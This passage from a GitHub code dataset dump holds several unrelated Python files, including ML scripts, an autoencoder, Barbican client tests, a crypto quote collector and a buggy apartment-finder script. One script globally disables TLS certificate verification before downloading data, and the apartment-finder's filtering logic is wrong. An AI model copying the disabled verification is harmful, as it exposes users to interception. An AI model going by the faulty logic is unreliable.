#vars for displaying current block acc\n block_acc_num += data['ACC']\n block_acc = block_acc_num/ntrials\n\n total_block_acc_num += block_acc\n total_block_acc = total_block_acc_num/(iblock+1)\n\n text_screen(\n text=\"You've completed block {}/{}\\n\\nBlock Accuracy: {}%\\nTotal Accuracy: {}%\\n\\nPress S when you are ready to continue.\".format(iblock+1,nblocks,int(block_acc*100),int(total_block_acc*100)),\n input_keys=\"s\",bg_color=[0,0,.3],win=win)\n\n if iblock+1 == nblocks: #end experiment\n if question['EEG'] == 'Y':\n parallel.setData(4)\n if question['Eyetracking'] == 'Y':\n tracker.send_message(sync + '4')\n if question['Eyetracking'] == 'Y':\n tracker.set_offline_mode()\n tracker.close_edf()\n tracker.transfer_edf()\n tracker.close_connection()\n text_screen(text= \"The study is complete!\\n\\nPlease contact your experimenter.\", input_keys= 'escape',win=win)\n win.close()\n\nrun_exp()","repo_name":"WilliamThyer/Thyer-et-al-2021-experiment","sub_path":"experiment/1801/wst1801.py","file_name":"wst1801.py","file_ext":"py","file_size_in_byte":21808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"16453473126","text":"import ssl\nimport pandas as pd\nssl._create_default_https_context = ssl._create_unverified_context\nfish = pd.read_csv('https://bit.ly/fish_csv_data')\n# print(fish.head())\n# print(pd.unique(fish['Species']))\nfish_input = fish[['Weight', 'Length', 'Diagonal', 'Height', 'Width']].to_numpy()\nfish_target = fish['Species'].to_numpy()\n# print(fish_input[:5])\n\nfrom sklearn.model_selection 
import train_test_split\ntrain_input, test_input, train_target, test_target = train_test_split(fish_input,\n fish_target, random_state=42)\n\nfrom sklearn.preprocessing import StandardScaler\nss = StandardScaler()\nss.fit(train_input)\ntrain_scaled = ss.transform(train_input)\ntest_scaled = ss.transform(test_input)\n\nfrom sklearn.neighbors import KNeighborsClassifier\nkn = KNeighborsClassifier(n_neighbors=3)\nkn.fit(train_scaled, train_target)\n# print(kn.score(train_scaled, train_target))\n# print(kn.score(test_scaled, test_target))\n# print(kn.classes_)\n\nimport numpy as np\nproba = kn.predict_proba(test_scaled[:5])\n# print(np.round(proba, decimals=4))\n\ndistances, indexes = kn.kneighbors(test_scaled[3:4])\nprint(train_target[indexes])\n","repo_name":"DonggeunJung/PythonSamples","sub_path":"ml/Fish1.py","file_name":"Fish1.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"20687441666","text":"# -*- coding: utf-8 -*-\r\nfrom __future__ import unicode_literals\r\n\r\nfrom django.db import migrations, models\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('contrib', '0023_cria_papeis_padrao'),\r\n ]\r\n\r\n operations = [\r\n migrations.AddField(\r\n model_name='servidor',\r\n name='uso_interno',\r\n field=models.BooleanField(default=False, help_text='Define que este servidor \\xe9 de uso interno do sistema'),\r\n ),\r\n ]\r\n","repo_name":"SegurancaDPDF/SOLAR-Backend","sub_path":"contrib/migrations/0024_add_uso_interno_em_servidor.py","file_name":"0024_add_uso_interno_em_servidor.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70300160571","text":"\"\"\"\nQUESTION-\n\nGiven the head of a linked list, rotate the list to the right by k places.\nEg:-\nInput: head = [1,2,3,4,5], k = 2\nOutput: [4,5,1,2,3] \n\"\"\"\n\"\"\"\nANSWER-\n\"\"\"\nclass Solution(object):\n def rotateRight(self, head, k): \n if not head:\n return head\n\n length = 1\n tail = head\n \n while tail.next:\n tail = tail.next\n length += 1\n \n k %= length\n \n if k == 0:\n return head\n \n\n steps_to_new_head = length - k\n tail.next = head\n \n while steps_to_new_head > 0:\n tail = tail.next\n steps_to_new_head -= 1\n\n new_head = tail.next\n tail.next = None\n \n return new_head\n\"\"\"\nSOURCE-LEETCODE\n\"\"\"","repo_name":"SreeramVipparla/DSA_Competitive_Coding","sub_path":"Programming_in_Python/02)Strings/Rotate_List.py","file_name":"Rotate_List.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"75143638971","text":"from barbicanclient import client\nfrom barbicanclient.tests import test_client\nfrom barbicanclient.tests.utils import mock_delete_secret_for_responses\nfrom barbicanclient.tests.utils import mock_get_secret_for_client\nfrom barbicanclient.tests.v1.test_secrets import SecretData\nfrom barbicanclient.v1 import secrets\n\nfrom oslo_serialization import jsonutils\n\n\nclass WhenTestingConsumers(test_client.BaseEntityResource):\n\n def setUp(self):\n self._setUp('secrets')\n\n self.secret = SecretData()\n\n self.client_v1_0 = client.Client(\n endpoint=self.endpoint, project_id=self.project_id,\n microversion='1.0')\n\n self.manager = self.client.secrets\n self.manager_v1_0 = self.client_v1_0.secrets\n\n self.consumers_post_resource = self.entity_href + 
'/consumers/'\n self.consumers_delete_resource = self.entity_href + '/consumers'\n\n def test_register_consumer_fails_with_lower_microversion(self):\n self.assertRaises(\n NotImplementedError, self.manager_v1_0.register_consumer,\n self.entity_href, self.secret.consumer.get('service'),\n self.secret.consumer.get('resource_type'),\n self.secret.consumer.get('resource_id'))\n\n def _register_consumer(self):\n data = self.secret.get_dict(\n self.entity_href, consumers=[self.secret.consumer])\n self.responses.post(self.entity_href + '/consumers/', json=data)\n return self.manager.register_consumer(\n self.entity_href, self.secret.consumer.get('service'),\n self.secret.consumer.get('resource_type'),\n self.secret.consumer.get('resource_id'))\n\n def test_should_register_consumer_with_correct_microversion(self):\n self._register_consumer()\n\n def test_should_register_consumer_and_return_secret(self):\n self.assertIsInstance(self._register_consumer(), secrets.Secret)\n\n def test_should_register_consumer_with_correct_secret_href(self):\n secret = self._register_consumer()\n self.assertEqual(self.entity_href, secret.secret_ref)\n\n def test_should_register_consumer_with_correct_url(self):\n self._register_consumer()\n self.assertEqual(\n self.consumers_post_resource, self.responses.last_request.url)\n\n def test_should_register_consumer_with_consumer(self):\n secret = self._register_consumer()\n self.assertEqual([self.secret.consumer], secret.consumers)\n\n def test_remove_consumer_fails_with_lower_microversion(self):\n self.assertRaises(\n NotImplementedError, self.manager_v1_0.remove_consumer,\n self.entity_href, self.secret.consumer.get('service'),\n self.secret.consumer.get('resource_type'),\n self.secret.consumer.get('resource_id'))\n\n def _remove_consumer(self):\n self.responses.delete(self.entity_href + '/consumers', status_code=204)\n self.manager.remove_consumer(\n self.entity_href, self.secret.consumer.get('service'),\n self.secret.consumer.get('resource_type'),\n self.secret.consumer.get('resource_id'))\n\n def test_should_remove_consumer_with_correct_microversion(self):\n self._remove_consumer()\n\n def test_should_remove_consumer_with_correct_url(self):\n self._remove_consumer()\n self.assertEqual(\n self.consumers_delete_resource, self.responses.last_request.url)\n\n def test_should_remove_consumer_with_correct_consumer(self):\n self._remove_consumer()\n self.assertEqual(\n self.consumers_delete_resource, self.responses.last_request.url)\n\n body = jsonutils.loads(self.responses.last_request.text)\n self.assertEqual(self.secret.consumer, body)\n\n def _delete_from_manager(self, secret_ref, force=False, consumers=[]):\n mock_get_secret_for_client(self.client, consumers=consumers)\n mock_delete_secret_for_responses(self.responses, self.entity_href)\n self.manager.delete(secret_ref=secret_ref, force=force)\n\n def _delete_from_manager_with_consumers(self, secret_ref, force=False):\n consumers = [{'service': 'service_test',\n 'resource_type': 'type_test',\n 'resource_id': 'id_test'}]\n\n self._delete_from_manager(secret_ref, force=force, consumers=consumers)\n\n def test_delete_from_manager_fails_with_consumers_without_force(self):\n self.assertRaises(\n ValueError,\n self._delete_from_manager_with_consumers, self.entity_href,\n force=False)\n\n def test_should_delete_from_manager_with_consumers_and_force(self):\n self._delete_from_manager_with_consumers(self.entity_href, force=True)\n\n def test_should_delete_from_manager_without_consumers_and_force(self):\n 
self._delete_from_manager(self.entity_href, force=True)\n\n def _list_consumers(self, secret_ref, consumers=[]):\n mock_get_secret_for_client(self.client, consumers)\n return self.manager.list_consumers(secret_ref)\n\n def test_list_consumers_from_secret_without_consumers(self):\n consumer_list = self._list_consumers(self.entity_href)\n self.assertTrue(len(consumer_list) == 0)\n\n def test_list_consumers_from_secret_with_consumers(self):\n consumers = [{'service': 'service_test1',\n 'resource_type': 'type_test1',\n 'resource_id': 'id_test1'},\n {'service': 'service_test2',\n 'resource_type': 'type_test2',\n 'resource_id': 'id_test2'}]\n consumer_list = self._list_consumers(self.entity_href, consumers)\n\n for elem in range(len(consumers)):\n self.assertTrue(\n consumer_list[elem].service ==\n consumers[elem]['service'])\n self.assertTrue(\n consumer_list[elem].resource_type ==\n consumers[elem]['resource_type'])\n self.assertTrue(\n consumer_list[elem].resource_id ==\n consumers[elem]['resource_id'])\n\n def test_should_fail_list_consumers_invalid_secret(self):\n self.assertRaises(ValueError, self.manager.list_consumers,\n **{'secret_ref': '12345'})\n","repo_name":"openstack/python-barbicanclient","sub_path":"barbicanclient/tests/v1/test_consumers.py","file_name":"test_consumers.py","file_ext":"py","file_size_in_byte":6238,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"78"} +{"seq_id":"25988463272","text":"\"\"\"Script to gather market data from OKCoin Spot Price API.\"\"\"\nimport requests\nimport datetime\nimport time\nfrom pytz import utc\nfrom datetime import datetime\n\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nfrom algo_trading.mongo_connect import rh_crypto_collection\n\nfrom algo_trading.exchange.exchange_context import ExchangeContext\nfrom algo_trading.exchange.robinhood_actions import RobinhoodActions\n\ncollection = rh_crypto_collection()\n\ndef tick(symbol, exchange_actions):\n aggregate_quote = grab_latest_aggregate_quote(symbol, exchange_actions)\n collection.insert_one(aggregate_quote)\n print(aggregate_quote)\n\ndef grab_latest_aggregate_quote(symbol, exchange_actions):\n quotes = []\n for _ in range(60):\n quotes.append(exchange_actions.get_crypto_quote(symbol))\n time.sleep(1)\n \n seq = [quote['bid_price'] for quote in quotes]\n return {\n \"high\": max(seq),\n \"low\": min(seq),\n \"date\": datetime.utcnow().isoformat(),\n \"close\": quotes[-1]['bid_price'],\n \"symbol\": symbol\n }\n\ndef main():\n \"\"\"Run tick() at the interval of every ten seconds.\"\"\"\n scheduler = BlockingScheduler(timezone=utc, job_defaults={'max_instances': 2})\n scheduler.add_job(tick, 'interval', ['BTC', ExchangeContext(RobinhoodActions())], seconds=60)\n try:\n scheduler.start()\n except (KeyboardInterrupt, SystemExit):\n pass\n\nif __name__ == '__main__':\n main()\n","repo_name":"joshfermin/algo-trading","sub_path":"algo_trading/data_collection/rh_crypto_data.py","file_name":"rh_crypto_data.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"5981900308","text":"#!/usr/bin/env python\n\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Input, Conv2D, ReLU, BatchNormalization, Flatten, Dense, Reshape, Conv2DTranspose, Activation\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.losses import MeanSquaredError, Huber\n\nimport pickle\nimport numpy as np\nimport argparse\n\nimport sys\nimport 
os\n# Add this directory to path so that package is recognized.\n# Looks like a hack, but is ok for now to allow moving forward\n# Source: https://stackoverflow.com/a/23891673/4973224\n# TODO: Replace with the idiomatic way.\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\"))\n\nfrom Audex.utils.utils_common import *\nfrom Audex.utils.utils_audex import *\n\ndef process_clargs():\n parser = argparse.ArgumentParser(description = 'This script launches an ASR client.')\n \n parser.add_argument(\"-sample_arch\", action ='store_true', help='Show an example model architecture summary.')\n \n args = parser.parse_args()\n return args\n\nclass Autoencoder:\n FILENAME_WEIGHTS = \"weights.h5\"\n FILENAME_HYPARAMS = \"hyparams.pkl\"\n \"\"\"\n Autoencoder represents a Deep Convolutional autoencoder architecture\n with mirrored encoder and decoder components.\n \"\"\"\n def __init__(self, input_shape, conv_filters, conv_kernels, conv_strides, dim_latent):\n self.input_shape = input_shape # (28, 28, 1)\n self.conv_filters = conv_filters # (2, 4, 8)-tuple\n self.conv_kernels = conv_kernels # (3, 5, 3)-tuple\n self.conv_strides = conv_strides # (1, 2, 2)-tuple\n self.dim_latent = dim_latent # 2\n\n self.model_enc = None\n self.model_dec = None\n self.model_ae = None\n\n self._num_conv_layers = len(conv_filters)\n self._shape_before_bottleneck = None\n self._model_input = None\n\n self._build()\n\n def summary(self):\n self.model_enc.summary()\n self.model_dec.summary()\n self.model_ae.summary()\n\n def compile(self, learning_rate=0.0001):\n opt = Adam(learning_rate=learning_rate)\n mse = MeanSquaredError()\n hub = Huber()\n self.model_ae.compile(optimizer=opt, loss=mse)\n\n def train(self, inputs, targets, batch_size, epochs, callbacks):\n # Example inputs.shape == (1660, 44, 16, 1)\n # Passing inputs as targets data is essentially the trick to make this NN generative\n # For NC, pass noisy audio as input data and clean audio as target data\n\n # x = np.full_like(inputs, 0.3) # experimentation with a fixed target\n \n # Fixed audio signum target\n #x = inputs[40]\n #x = np.repeat(x[np.newaxis, :, :, :], inputs.shape[0], axis=0) # repeated array\n\n print_info(\"Training AE on data of shapes:\")\n print_info(\"Inputs: \", inputs.shape)\n print_info(\"Targets:\", targets.shape)\n history = self.model_ae.fit(inputs, targets, batch_size=batch_size, epochs=epochs, shuffle=True, callbacks=callbacks)\n return history\n\n def save_model(self, trainid):\n MODEL_FULLPATH = os.path.join(Aimx.Paths.GEN_SAVED_MODELS, \"model_\" + trainid)\n MODEL_PARAMS_FULLPATH = os.path.join(MODEL_FULLPATH, self.FILENAME_HYPARAMS)\n MODEL_ASSETS_FULLPATH = os.path.join(MODEL_FULLPATH, \"assets\")\n Path(MODEL_FULLPATH).mkdir(parents=True, exist_ok=True)\n params = [\n self.input_shape,\n self.conv_filters,\n self.conv_kernels,\n self.conv_strides,\n self.dim_latent\n ]\n # Save parameters\n print_info(\"|||||| Saving model\", quote_path(MODEL_FULLPATH), \"... \", end=\"\")\n with open(MODEL_PARAMS_FULLPATH, \"wb\") as f:\n pickle.dump(params, f)\n \n # Save weights\n self.model_ae.save_weights(os.path.join(MODEL_FULLPATH, self.FILENAME_WEIGHTS))\n print_info(\"[DONE]\")\n\n # Save model quicksetup\n MODEL_QUICKSETUP_FULLPATH = os.path.join(WORKDIR, trainid + (\".bat\" if windows() else \".sh\"))\n with open(MODEL_QUICKSETUP_FULLPATH, \"w\") as f:\n print_info(\"|||||| Writing file\", quote_path(MODEL_QUICKSETUP_FULLPATH), \"... 
\", end=\"\")\n MODEL_METAS_FULLPATH = os.path.join(MODEL_ASSETS_FULLPATH, \"*.json\")\n if windows():\n content = \"xcopy \" + dquote(MODEL_METAS_FULLPATH) + \"^\\n\\t \" + dquote(WORKDIR) + \"^\\n\\t\" + \"/K /H /Y\"\n else: # Linux\n content = \"cp \" + MODEL_METAS_FULLPATH + \" \\\\\\n \" + WORKDIR\n f.write(content)\n print_info(\"[DONE]\")\n \n # Save assets\n Path(MODEL_ASSETS_FULLPATH).mkdir(parents=True, exist_ok=True) # create model assets directory (similar to TF2.x default's)\n print_info(\"|||||| Copying file\", quote_path(Aimx.Dataprep.RESULT_METADATA_FULLPATH), \"into model assets... \", end=\"\")\n copy2(Aimx.Dataprep.RESULT_METADATA_FULLPATH, MODEL_ASSETS_FULLPATH)\n print_info(\"[DONE]\")\n print_info(\"|||||| Copying file\", quote_path(Aimx.Training.RESULT_METADATA_FULLPATH), \"into model assets... \", end=\"\")\n copy2(Aimx.Training.RESULT_METADATA_FULLPATH, MODEL_ASSETS_FULLPATH)\n print_info(\"[DONE]\")\n print_info(\"|||||| Copying file\", quote_path(MODEL_QUICKSETUP_FULLPATH), \"into model assets... \", end=\"\")\n copy2(MODEL_QUICKSETUP_FULLPATH, MODEL_ASSETS_FULLPATH)\n print_info(\"[DONE]\")\n\n def load_weights(self, weights_path):\n self.model_ae.load_weights(weights_path)\n\n def regen(self, images):\n vencs = self.model_enc.predict(images) # encode into latent space\n genums = self.model_dec.predict(vencs) # decode from latent space into genum\n return vencs, genums\n\n def gen_random(self, n):\n vencs = np.random.rand(n, self.dim_latent) # n 1d arrays of size dim_latent\n genums = self.model_dec.predict(vencs)\n return vencs, genums\n\n @classmethod\n def load_model(cls, model_path):\n PARAMS_FULLPATH = os.path.join(model_path, cls.FILENAME_HYPARAMS)\n WEIGHTS_FULLPATH = os.path.join(model_path, cls.FILENAME_WEIGHTS)\n try:\n print_info(\"|||||| Loading model \" + quote_path(model_path) + \"... \", end=\"\")\n with open(PARAMS_FULLPATH, \"rb\") as p:\n params = pickle.load(p)\n ae = Autoencoder(*params)\n ae.load_weights(WEIGHTS_FULLPATH)\n print_info(\"[DONE (model loaded)]\", quote_path(model_path))\n except Exception as e:\n print(pinkred(\"\\nException caught while trying to load the model: \" + quote_path(model_path)))\n print(pinkred(\"Exception message: \") + red(str(e)))\n return ae\n\n def _build(self):\n self._build_encoder()\n self._build_decoder()\n self._build_autoencoder()\n\n def _build_encoder(self):\n encoder_input = self._add_encoder_input()\n conv_layers = self._add_conv_layers(encoder_input)\n bottleneck = self._add_bottleneck(conv_layers)\n self._model_input = encoder_input\n self.model_enc = tf.keras.Model(encoder_input, bottleneck, name=\"ENCODER\")\n\n def _build_decoder(self):\n decoder_input = self._add_decoder_input()\n dense_layer = self._add_dense_layer(decoder_input)\n reshape_layer = self._add_reshape_layer(dense_layer)\n conv_transpose_layers = self._add_conv_transpose_layers(reshape_layer)\n decoder_output = self._add_decoder_output(conv_transpose_layers)\n self.model_dec = tf.keras.Model(decoder_input, decoder_output, name=\"DECODER\")\n\n def _build_autoencoder(self):\n model_input = self._model_input\n model_output = self.model_dec(self.model_enc(model_input))\n self.model_ae = tf.keras.Model(model_input, model_output, name=\"AUTOENCODER\")\n\n def _add_encoder_input(self):\n return tf.keras.layers.Input(shape=self.input_shape, name=\"encoder_input\")\n\n def _add_conv_layers(self, encoder_input):\n \"\"\" Create all convolutional blocks in encoder. 
\"\"\"\n x = encoder_input\n for layer_index in range(self._num_conv_layers):\n x = self._add_conv_layer(layer_index, x)\n return x\n\n def _add_conv_layer(self, layer_index, x):\n \"\"\" Add a convolutional block to a graph of layers, consisting of conv 2d + ReLU + batch normalization. \"\"\"\n layer_number = layer_index + 1\n conv_layer = tf.keras.layers.Conv2D(\n filters = self.conv_filters[layer_index],\n kernel_size = self.conv_kernels[layer_index],\n strides = self.conv_strides[layer_index],\n padding = \"same\",\n name = f\"encoder_conv_layer_{layer_number}\"\n )\n x = conv_layer(x)\n x = tf.keras.layers.ReLU( name = f\"encoder_relu_{layer_number}\")(x)\n x = tf.keras.layers.BatchNormalization(name = f\"encoder_bn_{layer_number}\")(x)\n return x\n\n def _add_bottleneck(self, x):\n \"\"\" Flatten data and add bottleneck (Dense layer). \"\"\"\n # Save the shape just before flattening\n # to be able to restore it later in the decoder\n self._shape_before_bottleneck = tf.keras.backend.int_shape(x)[1:] # first dimension is batch size, ignore it and take only width, height and number of channels\n \n x = tf.keras.layers.Flatten()(x)\n #n = np.prod(self._shape_before_bottleneck)\n #x = tf.keras.layers.Dense(n/2)(x)\n #x = tf.keras.layers.Dense(n/4)(x)\n #x = tf.keras.layers.Dense(n/8)(x)\n x = tf.keras.layers.Dense(self.dim_latent, name=\"encoder_output\")(x)\n #x = tf.keras.layers.Dense(self.dim_latent, name=\"encoder_output2\")(x)\n #x = tf.keras.layers.Dense(self.dim_latent, name=\"encoder_output3\")(x)\n #x = tf.keras.layers.Dense(self.dim_latent, name=\"encoder_output4\")(x)\n #x = tf.keras.layers.Dense(self.dim_latent, name=\"encoder_output5\")(x)\n return x\n\n def _add_decoder_input(self):\n return tf.keras.layers.Input(shape=self.dim_latent, name=\"decoder_input\")\n\n def _add_dense_layer(self, decoder_input):\n # Here we want the same number of neurons as there are in the layer before the bottleneck,\n # but flattened. So for a shape of (1, 2, 4) we need 8 (which is the product of dimensions).\n num_neurons = np.prod(self._shape_before_bottleneck)\n #n = np.prod(self._shape_before_bottleneck)\n #dense_layer = tf.keras.layers.Dense(n/8)(decoder_input)\n #dense_layer = tf.keras.layers.Dense(n/4)(dense_layer)\n #dense_layer = tf.keras.layers.Dense(n/2)(dense_layer)\n #dense_layer = tf.keras.layers.Dense(num_neurons, name=\"decoder_dense\")(dense_layer)\n dense_layer = tf.keras.layers.Dense(num_neurons, name=\"decoder_dense\")(decoder_input)\n return dense_layer\n\n def _add_reshape_layer(self, dense_layer):\n return tf.keras.layers.Reshape(self._shape_before_bottleneck)(dense_layer)\n\n def _add_conv_transpose_layers(self, x):\n \"\"\" Add conv transpose blocks. 
\"\"\"\n # loop through all the conv layers in reverse order and stop at the first layer\n for layer_index in reversed(range(1, self._num_conv_layers)):\n x = self._add_conv_transpose_layer(layer_index, x)\n return x\n\n def _add_conv_transpose_layer(self, layer_index, x):\n layer_num = self._num_conv_layers - layer_index\n conv_transpose_layer = tf.keras.layers.Conv2DTranspose(\n filters = self.conv_filters[layer_index],\n kernel_size = self.conv_kernels[layer_index],\n strides = self.conv_strides[layer_index],\n padding = \"same\",\n name = f\"decoder_conv_transpose_layer_{layer_num}\"\n )\n x = conv_transpose_layer(x)\n x = tf.keras.layers.ReLU( name = f\"decoder_relu_{layer_num}\")(x)\n x = tf.keras.layers.BatchNormalization(name = f\"decoder_bn_{layer_num}\")(x)\n return x\n\n def _add_decoder_output(self, x):\n conv_transpose_layer = tf.keras.layers.Conv2DTranspose(\n filters = 1,\n kernel_size = self.conv_kernels[0],\n strides = self.conv_strides[0],\n padding = \"same\",\n name = f\"decoder_conv_transpose_layer_{self._num_conv_layers}\"\n )\n x = conv_transpose_layer(x)\n output_layer = tf.keras.layers.Activation(\"sigmoid\", name=\"sigmoid_layer\")(x)\n return output_layer\n\nif __name__ == \"__main__\":\n args = process_clargs()\n\n if args.sample_arch:\n autoencoder = Autoencoder(\n input_shape = (28, 28, 1),\n conv_filters = (32, 64, 64, 64), # 4 conv layers each with the corresponding number of filters\n # len() of tuples below must be at least that of the above, like here they are both of len() 4. Otherwise you'll get an error.\n conv_kernels = (3, 3, 3, 3),\n conv_strides = (1, 2, 2, 1), # stride 2 in conv layers means downsampling (halving) at that point\n dim_latent = 10\n )\n autoencoder.summary()","repo_name":"Aimxsys/Aimx","sub_path":"Audex/ae.py","file_name":"ae.py","file_ext":"py","file_size_in_byte":13225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"71050038971","text":"# Define import\n\n\n\nimport numpy as np # linear algebra\n\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\n\n\n\nfrom sklearn.preprocessing import StandardScaler\n\nfrom sklearn.preprocessing import LabelEncoder\n\nfrom keras.models import Sequential\n\nfrom keras.layers import Dense, Dropout\n\nfrom keras.callbacks import EarlyStopping\n\nfrom keras.regularizers import l2\n\nfrom keras import optimizers\n\n\n\nimport matplotlib.pyplot as plt\n\n\n\n# Input data files are available in the \"../input/\" directory.\n\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\n\n\nimport os\n\nprint(os.listdir(\"../input\"))\n\n# Import data\n\ntrain_input = pd.read_csv(\"../input/train.csv\")\n\ntest_input = pd.read_csv(\"../input/test.csv\")\n\ntrain_input.head()\n#Training Data input(x) and output(y)\n\ntrain_x = train_input.drop(['ID_code', 'target'], axis = 1)\n\ntrain_y = train_input['target']\n#Test Data input(x)\n\ntest_x = test_input.drop(['ID_code'], axis = 1)\n#standardized input\n\nss = StandardScaler()\n\ntrain_x_scaled = ss.fit_transform(train_x)\n\ntest_x_scaled = ss.transform(test_x)\n#Label encoded output\n\nencoder = LabelEncoder()\n\nencoder.fit(train_y)\n\ntrain_y_encoded = encoder.transform(train_y)\n#Definining the NN model\n\nmodel = Sequential()\n\nmodel.add(Dense(200, activation='relu', kernel_initializer='normal', kernel_regularizer=l2(0.001)))\n\nmodel.add(Dropout(0.4))\n\nmodel.add(Dense(50, activation='relu', kernel_regularizer=l2(0.001)))\n\nmodel.add(Dense(1, activation='sigmoid'))\n#Defining optimizer\n\n_opt= 'adam'\n\n_loss = 'binary_crossentropy'\n\n#complie model\n\nmodel.compile(loss=_loss, optimizer=_opt, metrics=['accuracy'])\n# Early stopping \n\n#from keras.callbacks import EarlyStopping\n\n_es_monitor = 'val_loss'\n\n_es_patience = 10\n\nes = EarlyStopping(monitor=_es_monitor, mode='min', verbose=1, patience=_es_patience)\n#batch size and number of epchos \n\n_batch_size = 1\n\n_epochs = 100\n#Train model\n\nhistory = model.fit(train_x_scaled, train_y_encoded, validation_split=0.20,\n\n epochs=_epochs, batch_size = len(train_x_scaled), verbose=1, callbacks=[es])\n#Evaluate Model's accuracy\n\nmetrics = model.evaluate(train_x_scaled, train_y_encoded)\n\nprint(\"\\n%s: %.2f%%\" % (model.metrics_names[1], metrics[1]*100))\n# Plot accuracy - Training vs Validation\n\nimport matplotlib.pyplot as plt\n\nplt.plot(history.history['acc'], label='train')\n\nplt.plot(history.history['val_acc'], label='test')\n\nplt.title('Accuracy - Training vs Validation')\n\nplt.ylabel('Accuracy')\n\nplt.xlabel('Epoch')\n\nplt.legend(['Train', 'Test'], loc='lower right')\n\nplt.show()\n\n# Plot loss - Training vs Validation\n\nimport matplotlib.pyplot as plt\n\n\n\nplt.plot(history.history['loss'], label='train loss')\n\nplt.plot(history.history['val_loss'], label='test loss')\n\nplt.title('Loss - Training vs Validation')\n\nplt.ylabel('Loss')\n\nplt.xlabel('Epoch')\n\nplt.legend(['Train', 'Test'], loc='upper right')\n\nplt.show()\n# Model predict on Test data\n\npredict = model.predict(test_x_scaled)\n\nresult = pd.DataFrame({\"ID_code\": pd.read_csv(\"../input/test.csv\")['ID_code'], \"target\": predict[:,0]})\n\nprint(result.head())\n\n\n\nresult.to_csv(\"submission.Arnab.Mar152019.4.csv\", index=False)","repo_name":"aorursy/new-nb-1","sub_path":"arnabdan_nn-dropouts-early-stopping-acc-loss-plots.py","file_name":"arnabdan_nn-dropouts-early-stopping-acc-loss-plots.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} 
+{"seq_id":"41328987131","text":"# Swap\r\n\r\n# embedded list\r\nPosts = [['NJ', '1b', '1br', '$500', 'yes', 'yes'], ['NJ', '3b', '1br', '$700', 'no', 'yes'], ['NY', '2b', '2br', '$600', 'yes', 'yes'], ['NY', '3b', '2br', '$1000', 'no', 'no'], ['PA', '2b', '1br', '$300', 'no', 'yes'], [\r\n 'PA', '2b', '2br', '$500', 'no', 'no'], ['DE', '4b', '2br', '$1100', 'yes', 'yes'], ['DE', '1b', '1br', '$200', 'no', 'no'], ['MA', '2b', '2br', '$700', 'yes', 'yes'], ['MA', '2b', '2br', '$650', 'no', 'yes']]\r\n\r\n# login with my_django_app\r\n\r\n# start program\r\n\r\nprint(\"Welcome to the Swap Apartment Finder! Please answer the following questions so we can match you with a place to stay! (Please type responses exactly how shown in Options)\")\r\n\r\nstate = input(\r\n \"What state are you looking for? (Options are NJ, NY, PA, DE, MA):\")\r\nprint(\"State: \" + state)\r\n\r\nbedrooms = input(\"How many bedrooms are you looking for? (Options are 1-4):\")\r\nprint(\"Bedrooms: \" + bedrooms)\r\n\r\nbathrooms = input(\"How many bathrooms are you looking for? (Options are 1-2):\")\r\nprint(\"Bathroom: \" + bathrooms)\r\n\r\nprice = input(\"What is you max price? (Do not enter $):\")\r\nprint(\"Price: \" + price)\r\n\r\npets = input(\"Pets? (Options are yes or no):\")\r\nprint(\"Pets: \" + pets)\r\n\r\nutilities = input(\"Utilities included? (Options are yes or no):\")\r\nprint(\"Utilities: \" + utilities)\r\n\r\n\r\nnewL = []\r\n\r\nfor i in Posts:\r\n if i[0] == state:\r\n newL.append(i)\r\n\r\nnewL2 = []\r\n\r\nfor i in newL:\r\n if i[1] >= bedrooms:\r\n newL2.append(i)\r\n\r\nnewL3 = []\r\n\r\nfor i in Posts:\r\n if i[2] >= bathrooms:\r\n newL3.append(i)\r\n\r\nnewL4 = []\r\n\r\nfor i in newL:\r\n if i[3] <= price:\r\n newL4.append(i)\r\n\r\nnewL5 = []\r\n\r\nfor i in Posts:\r\n if i[4] == pets:\r\n newL5.append(i)\r\n\r\nnewL6 = []\r\n\r\nfor i in newL:\r\n if i[5] == utilities:\r\n newL6.append(i)\r\n\r\nif newL6:\r\n print(\"Here are the available listings that match you criteria: \")\r\n print(newL6)\r\n\r\nelse:\r\n print(\"Oops! There are no available apartments fitting your criteria.\")\r\n","repo_name":"krtribel/CPE551_FinalProject","sub_path":"#Swap.py","file_name":"#Swap.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27516940095","text":"import inject\nfrom utils.config import Config\n\nfrom api.auth.service.google_oauth2_service import GoogleOAuth2Service\nfrom api.database.database_connection_manager import DatabaseConnectionManager\nfrom api.database.mysql_connection_manager import MySQLConnectionManager\nfrom api.user.repository.user_repository import UserRepository\nfrom api.user.service.user_service import UserService\n\n\nclass APIInitializer:\n \"\"\"\n This class is responsible for initializing the application with necessary dependencies.\n\n Args:\n phase (str): The current phase of the application (e.g. development, production)\n \"\"\"\n\n def __init__(self, phase: str):\n self.phase = phase\n inject.configure(self._bind)\n\n def _bind(self, binder: inject.Binder):\n \"\"\"\n Binds the necessary dependencies for the application.\n\n Args:\n binder (inject.Binder): The binder object to bind the dependencies.\n \"\"\"\n\n # 1. bind config\n config = Config(self.phase)\n binder.bind(Config, config)\n\n # 2. bind database connection\n database_connection = MySQLConnectionManager(config=config)\n 